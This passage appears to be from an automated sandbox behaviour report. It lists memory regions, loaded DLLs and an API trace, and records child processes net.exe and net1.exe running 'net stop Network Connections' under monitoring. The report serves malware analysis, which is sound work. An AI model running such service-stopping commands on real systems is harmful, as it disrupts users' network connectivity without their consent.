"pagefile_0x00000000006a0000" filename = "" Region: id = 3194 start_va = 0x7ffd43ba0000 end_va = 0x7ffd43e13fff monitored = 0 entry_point = 0x7ffd43c10400 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.10586.0_none_8c15ae12515e1c22\\comctl32.dll") Region: id = 3195 start_va = 0x6b0000 end_va = 0x6b0fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windowsshell.manifest" filename = "\\Windows\\WindowsShell.Manifest" (normalized: "c:\\windows\\windowsshell.manifest") Region: id = 3196 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Thread: id = 219 os_tid = 0xffc Thread: id = 220 os_tid = 0x230 Thread: id = 221 os_tid = 0xdb4 Thread: id = 222 os_tid = 0x780 Process: id = "40" image_name = "net.exe" filename = "c:\\windows\\syswow64\\net.exe" page_root = "0x60592000" os_pid = "0x1320" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x738" cmd_line = "net stop Network Connections" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3204 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3205 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3206 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3207 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3208 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3209 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3210 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3211 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3212 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 3213 start_va = 0xe80000 end_va = 0xe99fff monitored = 0 entry_point = 0xe831e0 region_type = mapped_file name = "net.exe" filename = "\\Windows\\SysWOW64\\net.exe" (normalized: "c:\\windows\\syswow64\\net.exe") Region: id = 3214 start_va = 0xea0000 end_va = 0x4e9ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000ea0000" filename = "" Region: id = 3215 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3216 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3217 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3218 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3219 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 3220 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3221 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 3222 start_va = 0x4f0000 end_va = 0x4fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004f0000" filename = "" Region: id = 3223 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3224 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3225 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3226 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3227 start_va = 0x500000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3228 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3229 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3230 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3231 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3232 start_va = 0x400000 end_va = 0x4bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3233 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3234 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3235 start_va = 0x500000 end_va = 0x57ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000500000" filename = "" Region: id = 3236 start_va = 0x5f0000 end_va = 0x6effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005f0000" filename = "" Region: id = 3237 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3238 start_va = 0x6ab50000 end_va = 0x6ab65fff monitored = 0 entry_point = 0x6ab521d0 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\SysWOW64\\mpr.dll" (normalized: "c:\\windows\\syswow64\\mpr.dll") Region: id = 3239 start_va = 0x6a930000 end_va = 0x6a93ffff monitored = 0 entry_point = 0x6a9334d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3240 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3241 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3242 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3243 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3244 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3245 start_va = 0x6a910000 end_va = 0x6a924fff monitored = 0 entry_point = 0x6a915210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 3246 start_va = 0x6a900000 end_va = 0x6a909fff monitored = 0 entry_point = 0x6a9028d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3247 start_va = 0x6a8e0000 end_va = 0x6a8fbfff monitored = 0 entry_point = 0x6a8e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3248 start_va = 0x73d10000 end_va = 0x73d3efff monitored = 0 entry_point = 0x73d1bb70 region_type = mapped_file name = "iphlpapi.dll" filename = "\\Windows\\SysWOW64\\IPHLPAPI.DLL" (normalized: "c:\\windows\\syswow64\\iphlpapi.dll") Region: id = 3249 start_va = 0x6a8d0000 end_va = 0x6a8defff monitored = 0 entry_point = 0x6a8d20e0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 3250 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3251 start_va = 0x6f0000 end_va = 0x80ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 3252 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Thread: id = 224 os_tid = 0x1324 Thread: id = 225 os_tid = 0x1328 Process: id = "41" image_name = "net1.exe" filename = "c:\\windows\\syswow64\\net1.exe" page_root = "0x6f3a5000" os_pid = "0x132c" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "40" os_parent_pid = "0x1320" cmd_line = "C:\\Windows\\system32\\net1 stop Network Connections" cur_dir = "C:\\Users\\RDhJ0CNFevzX\\Desktop\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000f4cd" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 3253 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 3254 start_va = 0x30000 end_va = 0x31fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3255 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 3256 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 3257 start_va = 0xa0000 end_va = 0x11ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 3258 start_va = 0x120000 end_va = 0x123fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000120000" filename = "" Region: id = 3259 start_va = 0x130000 end_va = 0x130fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000130000" filename = "" Region: id = 3260 start_va = 0x140000 end_va = 0x141fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 3261 start_va = 0x1f0000 end_va = 0x221fff monitored = 1 entry_point = 0x1f6bc0 region_type = mapped_file name = "net1.exe" filename = "\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe") Region: id = 3262 start_va = 0x230000 end_va = 0x422ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000230000" filename = "" Region: id = 3263 start_va = 0x4400000 end_va = 0x45fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004400000" filename = "" Region: id = 3264 start_va = 0x77b90000 end_va = 0x77d0afff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 3265 start_va = 0x7ffb0000 end_va = 0x7ffd2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 3266 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 3267 start_va = 0x7fff0000 end_va = 0x7dfd504cffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 3268 start_va = 0x7dfd504d0000 end_va = 0x7ffd504cffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007dfd504d0000" filename = "" Region: id = 3269 start_va = 0x7ffd504d0000 end_va = 0x7ffd50690fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 3270 start_va = 0x7ffd50691000 end_va = 0x7ffffffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00007ffd50691000" filename = "" Region: id = 3271 start_va = 0x42d0000 end_va = 0x42dffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042d0000" filename = "" Region: id = 3272 start_va = 0x6edd0000 end_va = 0x6ee1ffff monitored = 0 entry_point = 0x6ede8180 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 3273 start_va = 0x6ee20000 end_va = 0x6ee99fff monitored = 0 entry_point = 0x6ee33290 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 3274 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3275 start_va = 0x6eea0000 end_va = 0x6eea7fff monitored = 0 entry_point = 0x6eea17c0 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 3276 start_va = 0x42e0000 end_va = 0x43effff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000042e0000" filename = "" Region: id = 3277 start_va = 0x74f30000 end_va = 0x7500ffff monitored = 0 entry_point = 0x74f43980 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 3278 start_va = 0x76ad0000 end_va = 0x76c4dfff monitored = 0 entry_point = 0x76b81b90 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 3279 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 3280 start_va = 0x7feb0000 end_va = 0x7ffaffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 3281 start_va = 0x4600000 end_va = 0x46bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 3282 start_va = 0x74a10000 end_va = 0x74acdfff monitored = 0 entry_point = 0x74a45630 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 3283 start_va = 0x150000 end_va = 0x18ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000150000" filename = "" Region: id = 3284 start_va = 0x4230000 end_va = 0x42affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000004230000" filename = "" Region: id = 3285 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 3286 start_va = 0x748b0000 end_va = 0x748b9fff monitored = 0 entry_point = 0x748b2a00 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 3287 start_va = 0x77680000 end_va = 0x776d7fff monitored = 0 entry_point = 0x776c25c0 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 3288 start_va = 0x76c50000 end_va = 0x76c93fff monitored = 0 entry_point = 0x76c69d80 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 3289 start_va = 0x6a910000 end_va = 0x6a924fff monitored = 0 entry_point = 0x6a915210 region_type = mapped_file name = "samcli.dll" filename = "\\Windows\\SysWOW64\\samcli.dll" (normalized: "c:\\windows\\syswow64\\samcli.dll") Region: id = 3290 start_va = 0x6a900000 end_va = 0x6a909fff monitored = 0 entry_point = 0x6a9028d0 region_type = mapped_file name = "netutils.dll" filename = "\\Windows\\SysWOW64\\netutils.dll" (normalized: "c:\\windows\\syswow64\\netutils.dll") Region: id = 3291 start_va = 0x6a8c0000 end_va = 0x6a8c7fff monitored = 0 entry_point = 0x6a8c1c60 region_type = mapped_file name = "dsrole.dll" filename = "\\Windows\\SysWOW64\\dsrole.dll" (normalized: "c:\\windows\\syswow64\\dsrole.dll") Region: id = 3292 start_va = 0x74e80000 end_va = 0x74f2cfff monitored = 0 entry_point = 0x74e94f00 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 3293 start_va = 0x748c0000 end_va = 0x748ddfff monitored = 0 entry_point = 0x748cb640 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 3294 start_va = 0x6a8e0000 end_va = 0x6a8fbfff monitored = 0 entry_point = 0x6a8e4720 region_type = mapped_file name = "srvcli.dll" filename = "\\Windows\\SysWOW64\\srvcli.dll" (normalized: "c:\\windows\\syswow64\\srvcli.dll") Region: id = 3295 start_va = 0x6a930000 end_va = 0x6a93ffff monitored = 0 entry_point = 0x6a9334d0 region_type = mapped_file name = "wkscli.dll" filename = "\\Windows\\SysWOW64\\wkscli.dll" (normalized: "c:\\windows\\syswow64\\wkscli.dll") Region: id = 3296 start_va = 0x6e430000 end_va = 0x6e45efff monitored = 0 entry_point = 0x6e445140 region_type = mapped_file name = "logoncli.dll" filename = "\\Windows\\SysWOW64\\logoncli.dll" (normalized: "c:\\windows\\syswow64\\logoncli.dll") Region: id = 3297 start_va = 0x74560000 end_va = 0x7457afff monitored = 0 entry_point = 0x74569050 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\SysWOW64\\bcrypt.dll" (normalized: "c:\\windows\\syswow64\\bcrypt.dll") Region: id = 3298 start_va = 0x6a8d0000 end_va = 0x6a8defff monitored = 0 entry_point = 0x6a8d20e0 region_type = mapped_file name = "browcli.dll" filename = "\\Windows\\SysWOW64\\browcli.dll" (normalized: "c:\\windows\\syswow64\\browcli.dll") Region: id = 3299 start_va = 0x46c0000 end_va = 0x485ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000046c0000" filename = "" Region: id = 3300 start_va = 0x30000 end_va = 0x33fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 3301 start_va = 0x190000 end_va = 0x192fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "neth.dll" filename = "\\Windows\\SysWOW64\\neth.dll" (normalized: "c:\\windows\\syswow64\\neth.dll") Region: id = 3302 start_va = 0x1a0000 end_va = 0x1a1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 3303 start_va = 0x1b0000 end_va = 0x1b0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 3304 start_va = 0x1c0000 end_va = 0x1d1fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "neth.dll.mui" filename = "\\Windows\\SysWOW64\\en-US\\neth.dll.mui" (normalized: "c:\\windows\\syswow64\\en-us\\neth.dll.mui") Region: id = 3305 start_va = 0x1e0000 end_va = 0x1e2fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "netmsg.dll" filename = "\\Windows\\SysWOW64\\netmsg.dll" (normalized: "c:\\windows\\syswow64\\netmsg.dll") Region: id = 3306 start_va = 0x4860000 end_va = 0x4c5afff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000004860000" filename = "" Thread: id = 226 os_tid = 0x760 [0297.561] GetModuleHandleA (lpModuleName=0x0) returned 0x1f0000 [0297.561] __set_app_type (_Type=0x1) [0297.561] __p__fmode () returned 0x74ac4d6c [0297.561] __p__commode () returned 0x74ac5b1c [0297.562] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x1f6e00) returned 0x0 [0297.562] __getmainargs (in: _Argc=0x20f688, _Argv=0x20f68c, _Env=0x20f690, _DoWildCard=0, _StartInfo=0x20f69c | out: _Argc=0x20f688, _Argv=0x20f68c, _Env=0x20f690) returned 0 [0297.562] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0297.562] GetConsoleOutputCP () returned 0x1b5 [0297.566] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x217020 | out: lpCPInfo=0x217020) returned 1 [0297.566] SetThreadUILanguage (LangId=0x0) returned 0x409 [0297.572] sprintf_s (in: _DstBuf=0x11ff2c, _DstSize=0xc, _Format=".%u" | out: _DstBuf=".437") returned 4 [0297.572] setlocale (category=0, locale=".437") returned="English_United States.437" [0297.576] GetStdHandle (nStdHandle=0xfffffff5) returned 0x3c [0297.576] GetStdHandle (nStdHandle=0xfffffff4) returned 0x40 [0297.576] GetCommandLineW () returned="C:\\Windows\\system32\\net1 stop Network Connections" [0297.576] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x11fcd4, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\net1.exe" (normalized: "c:\\windows\\syswow64\\net1.exe")) returned 0x1c [0297.576] RtlAllocateHeap (HeapHandle=0x42f0000, Flags=0x0, Size=0x74) returned 0x42f6a80 [0297.576] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fcc8 | out: Buffer=0x11fcc8*=0x42f8128) returned 0x0 [0297.576] NetApiBufferAllocate (in: ByteCount=0x10, Buffer=0x11fccc | out: Buffer=0x11fccc*=0x42f8140) returned 0x0 [0297.576] __iob_func () returned 0x74ac1208 [0297.576] _fileno (_File=0x74ac1208) returned 0 [0297.576] _setmode (_FileHandle=0, _Mode=16384) returned 16384 [0297.577] _wcsicmp (_String1="accounts", _String2="stop") returned -18 [0297.577] _wcsicmp (_String1="computer", _String2="stop") returned -16 [0297.577] _wcsicmp (_String1="config", _String2="stop") returned -16 [0297.577] _wcsicmp (_String1="continue", _String2="stop") returned -16 [0297.577] _wcsicmp (_String1="cont", _String2="stop") returned -16 [0297.577] _wcsicmp (_String1="file", _String2="stop") returned -13 [0297.577] _wcsicmp (_String1="files", _String2="stop") returned -13 [0297.577] _wcsicmp (_String1="group", _String2="stop") returned -12 [0297.577] _wcsicmp (_String1="groups", _String2="stop") returned -12 [0297.577] _wcsicmp (_String1="help", _String2="stop") returned -11 [0297.577] _wcsicmp (_String1="helpmsg", _String2="stop") returned -11 [0297.577] _wcsicmp (_String1="localgroup", _String2="stop") returned -7 [0297.577] _wcsicmp (_String1="pause", _String2="stop") returned -3 [0297.577] _wcsicmp (_String1="session", _String2="stop") returned -15 [0297.577] _wcsicmp (_String1="sessions", _String2="stop") returned -15 [0297.577] _wcsicmp (_String1="sess", _String2="stop") returned -15 [0297.577] _wcsicmp (_String1="share", _String2="stop") returned -12 [0297.577] _wcsicmp (_String1="start", _String2="stop") returned -14 [0297.577] _wcsicmp (_String1="stats", _String2="stop") returned -14 [0297.578] _wcsicmp (_String1="statistics", _String2="stop") returned -14 [0297.578] _wcsicmp (_String1="stop", _String2="stop") returned 0 [0297.578] _wcsicmp (_String1="accounts", _String2="Network") returned -13 [0297.578] _wcsicmp (_String1="computer", _String2="Network") returned -11 [0297.578] _wcsicmp (_String1="config", _String2="Network") returned -11 [0297.578] _wcsicmp (_String1="continue", _String2="Network") returned -11 [0297.578] _wcsicmp (_String1="cont", _String2="Network") returned -11 [0297.578] _wcsicmp (_String1="file", _String2="Network") returned -8 [0297.578] _wcsicmp (_String1="files", _String2="Network") returned -8 [0297.578] _wcsicmp (_String1="group", _String2="Network") returned -7 [0297.578] _wcsicmp (_String1="groups", _String2="Network") returned -7 [0297.578] _wcsicmp (_String1="help", _String2="Network") returned -6 [0297.578] _wcsicmp (_String1="helpmsg", _String2="Network") returned -6 [0297.578] _wcsicmp (_String1="localgroup", _String2="Network") returned -2 [0297.578] _wcsicmp (_String1="pause", _String2="Network") returned 2 [0297.578] _wcsicmp (_String1="session", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="sessions", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="sess", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="share", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="start", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="stats", _String2="Network") returned 5 [0297.578] _wcsicmp (_String1="statistics", _String2="Network") returned 5 [0297.579] _wcsicmp (_String1="stop", _String2="Network") returned 5 [0297.579] _wcsicmp (_String1="time", _String2="Network") returned 6 [0297.579] _wcsicmp (_String1="user", _String2="Network") returned 7 [0297.579] _wcsicmp (_String1="users", _String2="Network") returned 7 [0297.579] _wcsicmp (_String1="msg", _String2="Network") returned -1 [0297.579] _wcsicmp (_String1="messenger", _String2="Network") returned -1 [0297.579] _wcsicmp (_String1="receiver", _String2="Network") returned 4 [0297.579] _wcsicmp (_String1="rcv", _String2="Network") returned 4 [0297.579] _wcsicmp (_String1="netpopup", _String2="Network") returned -7 [0297.579] _wcsicmp (_String1="redirector", _String2="Network") returned 4 [0297.579] _wcsicmp (_String1="redir", _String2="Network") returned 4 [0297.579] _wcsicmp (_String1="rdr", _String2="Network") returned 4 [0297.579] _wcsicmp 